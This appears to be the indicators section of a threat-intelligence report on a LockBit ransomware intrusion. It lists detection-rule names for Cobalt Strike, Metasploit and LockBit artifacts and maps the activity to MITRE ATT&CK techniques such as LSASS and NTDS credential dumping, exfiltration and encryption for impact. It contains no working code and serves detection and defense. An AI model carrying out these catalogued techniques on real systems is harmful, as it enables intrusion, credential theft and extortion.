SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1                                                                                                                                                                   
SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
CobaltStrike_Resources_Httpsstager_Bin_v2_5_through_v4_x
CobaltStrike_Resources_Xor_Bin_v2_x_to_v4_x
CobaltStrike_Sleep_Decoder_Indicator
Cobaltbaltstrike_Beacon_XORed_x86
Cobaltbaltstrike_RAW_Payload_https_stager_x86
HKTL_CobaltStrike_Beacon_4_2_Decrypt
HKTL_CobaltStrike_Beacon_Strings
HKTL_CobaltStrike_SleepMask_Jul22
HKTL_Win_CobaltStrike
SUSP_PS1_JAB_Pattern_Jun22_1
WiltedTulip_WindowsTask
Windows_Shellcode_Generic_8c487e57
Windows_Trojan_CobaltStrike_3dc22d14
Windows_Trojan_CobaltStrike_8d5963a2
Windows_Trojan_CobaltStrike_b54b94ac
Windows_Trojan_Metasploit_24338919
Windows_Trojan_Metasploit_38b8ceec
Windows_Trojan_Metasploit_7bc0f998
Windows_Trojan_Metasploit_c9773203

MITRE ATT&CK

Credentials In Files - T1552.001
Data Encrypted for Impact - T1486
Disable or Modify Tools - T1562.001
Domain Account - T1087.002
Domain Groups - T1069.002
Domain Trust Discovery - T1482
Exfiltration Over Alternative Protocol - T1048
Exfiltration to Cloud Storage - T1567.002
Group Policy Discovery - T1615
LSASS Memory - T1003.001
Malicious File - T1204.002
Masquerading - T1036
Match Legitimate Name or Location - T1036.005
NTDS - T1003.003
PowerShell - T1059.001
Process Discovery - T1057
Process Injection - T1055
Proxy - T1090
Registry Run Keys / Startup Folder - T1547.001
Remote Desktop Protocol - T1021.001
Remote System Discovery - T1018
Scheduled Task - T1053.005
Service Execution - T1569.002
SMB/Windows Admin Shares - T1021.002
Web Protocols - T1071.001
Windows Command Shell - T1059.003
Windows Management Instrumentation - T1047
Windows Remote Management - T1028